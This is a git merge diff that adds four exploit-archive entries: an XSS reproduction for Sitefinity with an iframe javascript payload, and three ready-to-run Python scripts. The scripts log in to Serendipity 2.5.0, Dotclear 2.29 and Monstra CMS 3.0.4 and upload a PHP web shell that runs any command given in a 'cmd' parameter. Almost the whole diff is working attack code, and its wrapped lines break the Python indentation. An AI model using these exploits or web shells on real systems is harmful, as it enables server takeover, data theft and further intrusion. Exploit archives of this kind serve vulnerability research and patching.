Merge remote-tracking branch 'upstream/main'

exploits/multiple/webapps/52035.txt

@@ -0,0 +1,23 @@
+# Exploit Title: Sitefinity 15.0 - Cross-Site Scripting (XSS)
+# Date: 2023-12-05
+# Exploit Author: Aldi Saputra Wahyudi
+# Vendor Homepage: https://www.progress.com/sitefinity-cms
+# Version: < 15.0.0
+# Tested on: Windows/Linux
+# CVE : CVE-2023-27636
+
+# Description: In the backend of the Sitefinity CMS, a Cross-site scripting vulnerability has been discovered in all features that use SF-Editor
+
+# Steps To Reproduce:
+
+Attacker as lower privilege
+Victim as Higher privilege
+
+1. Login as an Attacker
+2. Go to the function using the SF Editor, go to the news page as example
+3. Create or Edit news item
+4. On the content form, insert the XSS payload as HTML
+5. After the payload is inserted, click on the content form (just click) and publish or save
+6. If the victim visits the page with XSS payload, XSS will be triggered
+
+Payload: <noalert><iframe src="javascript:alert(document.domain);">

exploits/php/webapps/52036.py

@@ -0,0 +1,107 @@
+# Exploit Title: Serendipity 2.5.0 - Remote Code Execution (RCE)
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 26.04.2024
+# Vendor Homepage: https://docs.s9y.org/
+# Software Link:https://www.s9y.org/latest
+# Tested Version: v2.5.0 (latest)
+# Tested on: MacOS
+
+import requests
+import time
+import random
+import string
+from bs4 import BeautifulSoup
+
+def generate_filename(extension=".inc"):
+return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +
+extension
+
+def get_csrf_token(response):
+soup = BeautifulSoup(response.text, 'html.parser')
+token = soup.find('input', {'name': 'serendipity[token]'})
+return token['value'] if token else None
+
+def login(base_url, username, password):
+print("Logging in...")
+time.sleep(2)
+session = requests.Session()
+login_page = session.get(f"{base_url}/serendipity_admin.php")
+token = get_csrf_token(login_page)
+data = {
+"serendipity[action]": "admin",
+"serendipity[user]": username,
+"serendipity[pass]": password,
+"submit": "Login",
+"serendipity[token]": token
+}
+headers = {
+"Content-Type": "application/x-www-form-urlencoded",
+"Referer": f"{base_url}/serendipity_admin.php"
+}
+response = session.post(f"{base_url}/serendipity_admin.php", data=data,
+headers=headers)
+if "Add media" in response.text:
+print("Login Successful!")
+time.sleep(2)
+return session
+else:
+print("Login Failed!")
+return None
+
+def upload_file(session, base_url, filename, token):
+print("Shell Preparing...")
+time.sleep(2)
+boundary = "---------------------------395233558031804950903737832368"
+headers = {
+"Content-Type": f"multipart/form-data; boundary={boundary}",
+"Referer": f"{base_url}
+/serendipity_admin.php?serendipity[adminModule]=media"
+}
+payload = (
+f"--{boundary}\r\n"
+f"Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n"
+f"{token}\r\n"
+f"--{boundary}\r\n"
+f"Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n"
+f"admin\r\n"
+f"--{boundary}\r\n"
+f"Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n"
+f"media\r\n"
+f"--{boundary}\r\n"
+f"Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n"
+f"add\r\n"
+f"--{boundary}\r\n"
+f"Content-Disposition: form-data; name=\"serendipity[userfile][1]\";
+filename=\"{filename}\"\r\n"
+f"Content-Type: text/html\r\n\r\n"
+"<html>\n<body>\n<form method=\"GET\" name=\"<?php echo
+basename($_SERVER['PHP_SELF']); ?>\">\n"
+"<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input
+type=\"SUBMIT\" value=\"Execute\">\n"
+"</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}
+\n?>\n</pre>\n</body>\n</html>\r\n"
+f"--{boundary}--\r\n"
+)
+
+response = session.post(f"{base_url}
+/serendipity_admin.php?serendipity[adminModule]=media", headers=headers,
+data=payload.encode('utf-8'))
+if f"File {filename} successfully uploaded as" in response.text:
+print(f"Your shell is ready: {base_url}/uploads/{filename}")
+else:
+print("Exploit Failed!")
+
+def main(base_url, username, password):
+filename = generate_filename()
+session = login(base_url, username, password)
+if session:
+token = get_csrf_token(session.get(f"{base_url}
+/serendipity_admin.php?serendipity[adminModule]=media"))
+upload_file(session, base_url, filename, token)
+
+if __name__ == "__main__":
+import sys
+if len(sys.argv) != 4:
+print("Usage: python script.py <siteurl> <username> <password>")
+else:
+main(sys.argv[1], sys.argv[2], sys.argv[3])

exploits/php/webapps/52037.py

@@ -0,0 +1,96 @@
+# Exploit Title: Dotclear 2.29 - Remote Code Execution (RCE)
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 26.04.2024
+# Vendor Homepage: https://git.dotclear.org/explore/repos
+# Software Link:
+https://github.com/dotclear/dotclear/archive/refs/heads/master.zip
+# Tested Version: v2.29 (latest)
+# Tested on: MacOS
+
+import requests
+import time
+import random
+import string
+from bs4 import BeautifulSoup
+
+def generate_filename(extension=".inc"):
+return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +
+extension
+
+def get_csrf_token(response_text):
+soup = BeautifulSoup(response_text, 'html.parser')
+token = soup.find('input', {'name': 'xd_check'})
+return token['value'] if token else None
+
+def login(base_url, username, password):
+print("Exploiting...")
+time.sleep(1)
+print("Logging in...")
+time.sleep(1)
+session = requests.Session()
+login_data = {
+"user_id": username,
+"user_pwd": password
+}
+login_url = f"{base_url}/admin/index.php?process=Auth"
+login_response = session.post(login_url, data=login_data)
+if "Logout" in login_response.text:
+print("Login Successful!")
+return session
+else:
+print("Login Failed!")
+return None
+
+def upload_file(session, base_url, filename):
+print("Shell Preparing...")
+time.sleep(1)
+boundary = "---------------------------376201441124932790524235275389"
+headers = {
+"Content-Type": f"multipart/form-data; boundary={boundary}",
+"X-Requested-With": "XMLHttpRequest"
+}
+csrf_token = get_csrf_token(session.get(f"{base_url}
+/admin/index.php?process=Media").text)
+payload = (
+f"--{boundary}\r\n"
+f"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n"
+f"2097152\r\n"
+f"--{boundary}\r\n"
+f"Content-Disposition: form-data; name=\"xd_check\"\r\n\r\n"
+f"{csrf_token}\r\n"
+f"--{boundary}\r\n"
+f"Content-Disposition: form-data; name=\"upfile[]\"; filename=\"{filename}
+\"\r\n"
+f"Content-Type: image/jpeg\r\n\r\n"
+"<html>\n<body>\n<form method=\"GET\" name=\"<?php echo
+basename($_SERVER['PHP_SELF']); ?>\">\n"
+"<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input
+type=\"SUBMIT\" value=\"Execute\">\n"
+"</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}
+\n?>\n</pre>\n</body>\n</html>\r\n"
+f"--{boundary}--\r\n"
+)
+upload_response = session.post(f"{base_url}
+/admin/index.php?process=Media&sortby=name&order=asc&nb=30&page=1&q=&file_mode=grid&file_type=&plugin_id=&popup=0&select=0",
+headers=headers, data=payload.encode('utf-8'))
+
+if upload_response.status_code == 200:
+print(f"Your Shell is Ready: {base_url}/public/{filename}")
+else:
+print("Exploit Failed!")
+
+def main(base_url, username, password):
+filename = generate_filename()
+session = login(base_url, username, password)
+if session:
+upload_file(session, base_url, filename)
+
+if __name__ == "__main__":
+import sys
+if len(sys.argv) != 4:
+print("Usage: python script.py <siteurl> <username> <password>")
+else:
+base_url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+main(base_url, username, password)

exploits/php/webapps/52038.py

@@ -0,0 +1,93 @@
+# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)
+# Date: 05.05.2024
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://monstra.org/
+# Software Link: https://monstra.org/monstra-3.0.4.zip
+# Version: 3.0.4
+# Tested on: MacOS
+
+import requests
+import random
+import string
+import time
+import re
+import sys
+
+if len(sys.argv) < 4:
+print("Usage: python3 script.py <url> <username> <password>")
+sys.exit(1)
+
+base_url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+
+session = requests.Session()
+
+login_url = f'{base_url}/admin/index.php?id=dashboard'
+login_data = {
+'login': username,
+'password': password,
+'login_submit': 'Log+In'
+}
+
+filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=
+5))
+
+print("Logging in...")
+response = session.post(login_url, data=login_data)
+
+if 'Dashboard' in response.text:
+print("Login successful")
+else:
+print("Login failed")
+exit()
+
+time.sleep(3)
+
+edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'
+response = session.get(edit_url) # CSRF token bulmak için edit sayfasına
+erişim
+
+token_search = re.search(r'input type="hidden" id="csrf" name="csrf" value="
+(.*?)"', response.text)
+if token_search:
+token = token_search.group(1)
+else:
+print("CSRF token could not be found.")
+exit()
+
+content = '''
+<html>
+<body>
+<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
+<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
+<input type="SUBMIT" value="Execute">
+</form>
+<pre>
+<?php
+if(isset($_GET['cmd']))
+{
+system($_GET['cmd']);
+}
+?>
+</pre>
+</body>
+</html>
+'''
+
+edit_data = {
+'csrf': token,
+'name': filename,
+'content': content,
+'add_file': 'Save'
+}
+
+print("Preparing shell...")
+response = session.post(edit_url, data=edit_data)
+time.sleep(3)
+
+if response.status_code == 200:
+print(f"Your shell is ready: {base_url}/public/themes/default/{filename}
+.chunk.php")
+else:
+print("Failed to prepare shell.")